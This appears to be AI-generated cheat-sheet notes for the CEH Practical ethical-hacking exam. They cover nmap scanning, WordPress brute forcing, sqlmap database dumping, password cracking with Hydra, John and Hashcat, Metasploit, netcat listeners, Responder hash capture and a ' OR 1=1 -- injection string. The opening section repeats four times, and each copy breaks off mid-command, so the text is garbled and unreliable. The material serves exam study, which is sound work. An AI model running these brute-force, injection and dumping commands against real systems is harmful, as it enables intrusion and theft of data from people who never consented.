` • Step 2 (Identify RDP/MSSQL): Filter specifically for common high-value ports. o RDP (Port 3389): nmap -sV -p 3389 o MSSQL (Port 1433): nmap -sV -p 1433 o MySQL (Port 3306): nmap -sV -p 3306 • Step 3 (OS via TTL): If Nmap is blocked, ping the target. o TTL 128: Windows machine. o TTL 64: Linux machine. 2. Web & WordPress Exploitation Goal: Find users, vulnerabilities, and database content. • Step 1 (WordPress Enumeration): Find users like "Raj" and active plugins. o wpscan --url http:///wordpress -e u,p • Step 2 (WordPress Brute Force): Crack the identified user's password. o wpscan --url http:///wordpress -U Raj -P /home/attacker/Desktop/wordlist.txt • **Step 3Since your CEH Practical exam is tomorrow, May 3rd, I have synthesized all your provided questions into a streamlined, step-by-step master guide. These are the exact workflows you will need for the various scenarios you've shared. ________________________________________ 1. Network Discovery & OS Detection Goal: Identify machines, open ports, and operating systems. • Step 1: Run an aggressive scan on the network range to see what is alive. o nmap -sV -O -Pn • Step 2 (Identify RDP/MSSQL): Filter specifically for common high-value ports. o RDP (Port 3389): nmap -sV -p 3389 o MSSQL (Port 1433): nmap -sV -p 1433 o MySQL (Port 3306): nmap -sV -p 3306 • Step 3 (OS via TTL): If Nmap is blocked, ping the target. o TTL 128: Windows machine. o TTL 64: Linux machine. 2. Web & WordPress Exploitation Goal: Find users, vulnerabilities, and database content. • Step 1 (WordPress Enumeration): Find users like "Raj" and active plugins. o wpscan --url http:///wordpress -e u,p • Step 2 (WordPress Brute Force): Crack the identified user's password. o wpscan --url http:///wordpress -U Raj -P /home/attacker/Desktop/wordlist.txt • Step 3 (SQL Injection via SQLmap): o List Databases: `sqlmap -u "http://target.com/id=1" --dbsSince your CEH Practical exam is tomorrow, May 3rd, I have synthesized all your provided questions into a streamlined, step-by-step master guide. These are the exact workflows you will need for the various scenarios you've shared. ________________________________________ 1. Network Discovery & OS Detection Goal: Identify machines, open ports, and operating systems. • Step 1: Run an aggressive scan on the network range to see what is alive. o nmap -sV -O -Pn • Step 2 (Identify RDP/MSSQL): Filter specifically for common high-value ports. o RDP (Port 3389): nmap -sV -p 3389 o MSSQL (Port 1433): nmap -sV -p 1433 o MySQL (Port 3306): nmap -sV -p 3306 • Step 3 (OS via TTL): If Nmap is blocked, ping the target. o TTL 128: Windows machine. o TTL 64: Linux machine. 2. Web & WordPress Exploitation Goal: Find users, vulnerabilities, and database content. • Step 1 (WordPress Enumeration): Find users like "Raj" and active plugins. o wpscan --url http:///wordpress -e u,p • Step 2 (WordPress Brute Force): Crack the identified user's password. o wpscan --url http:///wordpress -U Raj -P /home/attacker/Desktop/wordlist.txt • Step 3 (SQL Injection via SQLmap): o List Databases: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" --dbsSince your CEH Practical exam is tomorrow, May 3rd, I have synthesized all your provided questions into a streamlined, step-by-step master guide. These are the exact workflows you will need for the various scenarios you've shared. ________________________________________ 1. Network Discovery & OS Detection Goal: Identify machines, open ports, and operating systems. • Step 1: Run an aggressive scan on the network range to see what is alive. o nmap -sV -O -Pn • Step 2 (Identify RDP/MSSQL): Filter specifically for common high-value ports. o RDP (Port 3389): nmap -sV -p 3389 o MSSQL (Port 1433): nmap -sV -p 1433 o MySQL (Port 3306): nmap -sV -p 3306 • Step 3 (OS via TTL): If Nmap is blocked, ping the target. o TTL 128: Windows machine. o TTL 64: Linux machine. 2. Web & WordPress Exploitation Goal: Find users, vulnerabilities, and database content. • Step 1 (WordPress Enumeration): Find users like "Raj" and active plugins. o wpscan --url http:///wordpress -e u,p • Step 2 (WordPress Brute Force): Crack the identified user's password. o wpscan --url http:///wordpress -U Raj -P /home/attacker/Desktop/wordlist.txt • Step 3 (SQL Injection via SQLmap): o List Databases: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" --dbs o List Tables: `sqlmap -u "http://target.com/id=1" -D <db_nameSince your CEH Practical exam is tomorrow, May 3rd, I have synthesized all your provided questions into a streamlined, step-by-step master guide. These are the exact workflows you will need for the various scenarios you've shared. ________________________________________ 1. Network Discovery & OS Detection Goal: Identify machines, open ports, and operating systems. • Step 1: Run an aggressive scan on the network range to see what is alive. o nmap -sV -O -Pn • Step 2 (Identify RDP/MSSQL): Filter specifically for common high-value ports. o RDP (Port 3389): nmap -sV -p 3389 o MSSQL (Port 1433): nmap -sV -p 1433 o MySQL (Port 3306): nmap -sV -p 3306 • Step 3 (OS via TTL): If Nmap is blocked, ping the target. o TTL 128: Windows machine. o TTL 64: Linux machine. 2. Web & WordPress Exploitation Goal: Find users, vulnerabilities, and database content. • Step 1 (WordPress Enumeration): Find users like "Raj" and active plugins. o wpscan --url http:///wordpress -e u,p • Step 2 (WordPress Brute Force): Crack the identified user's password. o wpscan --url http:///wordpress -U Raj -P /home/attacker/Desktop/wordlist.txt • Step 3 (SQL Injection via SQLmap): o List Databases: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" --dbs o List Tables: sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" -D --tables o Dump Data (Find Phone Numbers/Emails): sqlmap -u "[http://target.com/id=1](http://target.com/id=1)" -D -T --dump 3. Password Cracking (Hydra & Hashcat) Goal: Crack FTP, SSH, SMB, or file hashes. • Step 1 (Hydra for Services): o hydra -l -P /path/to/wordlist.txt ftp (or smb, ssh). • Step 2 (Identify Hashes): Use hash-identifier to determine the algorithm (MD5, SHA-1, etc.). • Step 3 (Crack Hashes): o John: john --wordlist=rockyou.txt hash.txt o Hashcat: hashcat -m 0 hash.txt rockyou.txt (where -m 0 is MD5). 4. Traffic Analysis (Wireshark PCAP) Goal: Recover passwords, identify DoS attackers, and extract files. • Step 1 (Plaintext Credentials): Filter for http.request.method == "POST" or ftp. • Step 2 (DoS/DDoS Attacker Identification): o Go to Statistics -> Conversations -> IPv4. o Sort by Packets. The IP with a massive number of packets is the attacker. • Step 3 (Analyze Email): Filter for smtp and right-click -> Follow TCP Stream to find sender/recipient IPs. 5. Steganography & Forensics Goal: Extract hidden data and check file integrity. • Step 1 (Steghide): For .jpg or .wav files. o steghide extract -sf secret.jpg • Step 2 (Integrity Check): Compare hashes to see if a file was tampered with. o md5sum o Compare the output to the hashes in the provided /hashes folder. • Step 3 (VeraCrypt): If you find a .vc or volume file, use the VeraCrypt GUI to mount it using a recovered password. 6. Mobile & Android (ADB) Goal: Extract info from the device. • Step 1: Connect: adb connect . • Step 2: List files: adb shell ls -R /sdcard/. • Step 3: Pull data: adb pull /sdcard/TargetFile.txt . 1. Basic Detection (Finding Databases) Start by identifying if the URL is vulnerable and listing the available databases. • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" --dbs • Purpose: The --dbs flag enumerates all databases on the server. 2. Enumerating Tables Once you have the database name (e.g., user_data), find the tables within it. • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" -D user_data --tables • Purpose: The -D flag specifies the database, and --tables lists all tables inside it. 3. Enumerating Columns If you need to find specific fields like "Phone Number" or "Password," list the columns of a specific table (e.g., employees). • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" -D user_data -T employees --columns • Purpose: The -T flag specifies the table, and --columns shows the structure (e.g., name, phone, email). 4. Dumping Data (Getting the Answer) This is the final step to "find contact details" or "extract information". • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" -D user_data -T employees --dump • Purpose: The --dump flag extracts all records from the specified table and displays them in the terminal. 5. Advanced Flags for the Exam • Automate Inputs: Add --batch to automatically choose "Yes" for all prompts (saves time). • Specify Parameter: If there are multiple parameters, use -p (e.g., -p id) to tell sqlmap exactly which one to test. • Increase Risk/Level: If detection fails, use --level=3 --risk=3 to perform more aggressive testing. Summary Workflow 1. Find DBs: --dbs 2. Find Tables: -D --tables 3. Dump Data: -D -T --dump 1. Identify the Database Name Start by checking if the URL is vulnerable and listing the databases. • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" --dbs --batch • Action: Look for a database that isn't information_schema or mysql (e.g., CEH_DB). 2. List Tables in the Database Once you have the database name, find the tables where the sensitive info is hidden. • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" -D CEH_DB --tables --batch • Action: Identify tables that look promising, such as users, employees, or contacts. 3. List Columns in a Specific Table If the question asks for a specific piece of data (like a "Phone Number"), check the column names first. • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" -D CEH_DB -T users --columns --batch • Action: This confirms if columns like username, password, or phone exist. 4. Dump the Target Data This is the command that gives you the final answer for your exam flag. • Command: sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" -D CEH_DB -T users --dump --batch • Action: sqlmap will extract everything from that table and display it in a neat grid for you to read. ________________________________________ Pro-Tips for the Exam • Handling Multiple Parameters: If the URL has multiple parts (e.g., id=1&type=admin), use -p to tell sqlmap exactly which one to test: o sqlmap -u "[http://target.com/page.php?id=1&type=admin](http://target.com/page.php?id=1&type=admin)" -p id --dbs --batch • Aggressive Testing: If the basic command doesn't work, increase the level of testing: o sqlmap -u "[http://target.com/page.php?id=1](http://target.com/page.php?id=1)" --dbs --level=3 --risk=3 --batch • Finding the URL: In the CEH lab, you usually find the vulnerable URL by first running an nmap scan or using a tool like dirb or gobuster to find hidden pages. 0. UNIVERSAL FIRST STEP (ALWAYS DO THIS) nmap -sC -sV -oN scan.txt 👉 This gives: • Ports • Services • Versions • Default scripts output ⚠️ 80% of answers start from here. ________________________________________ 🔍 1. FULL PORT SCAN (if needed) nmap -p- nmap -p- --min-rate 1000 👉 Use when: • Nothing useful found in normal scan ________________________________________ 📂 2. SMB ENUMERATION (VERY COMMON) smbclient -L // smbclient ///share enum4linux 👉 Look for: • Shares • Usernames • Anonymous login ________________________________________ 🌐 3. WEB ENUMERATION (MOST SCORING AREA) Directory Bruteforce gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt Alternative: dirb http:// 👉 Check: • /admin • /backup • /login • /uploads ________________________________________ View Source (VERY IMPORTANT) • Right click → View Page Source • Look for: o hidden comments o credentials ________________________________________ 💣 4. METASPLOIT (DON’T OVERCOMPLICATE) msfconsole search use set RHOSTS set LHOST run After exploit: sessions sessions -i 1 ________________________________________ 🐚 5. SHELL BASICS (YOU WILL NEED THIS) whoami hostname pwd ls cat file.txt 👉 Many answers = inside files ________________________________________ 🔑 6. PASSWORD ATTACKS Hydra (login brute force) hydra -l admin -P pass.txt ssh John (hash cracking) john hash.txt john --show hash.txt ________________________________________ 📡 7. NETCAT (VERY USEFUL) Connect: nc Listener: nc -lvnp 4444 ________________________________________ 📁 8. FILE TRANSFER wget http:///file curl -O http:///file ________________________________________ 🧠 9. RESONDER (HASH CAPTURE) responder -I eth0 👉 Answer often = username or hash ________________________________________ 🌐 10. SQL INJECTION (BASIC) Try in URL: ' OR 1=1 -- 👉 Or use: sqlmap -u "http:///page?id=1" --dbs ________________________________________ 📦 11. FTP ftp Try: • anonymous login ________________________________________ 🧾 12. SEARCH INSIDE SYSTEM find / -name "flag.txt" 2>/dev/null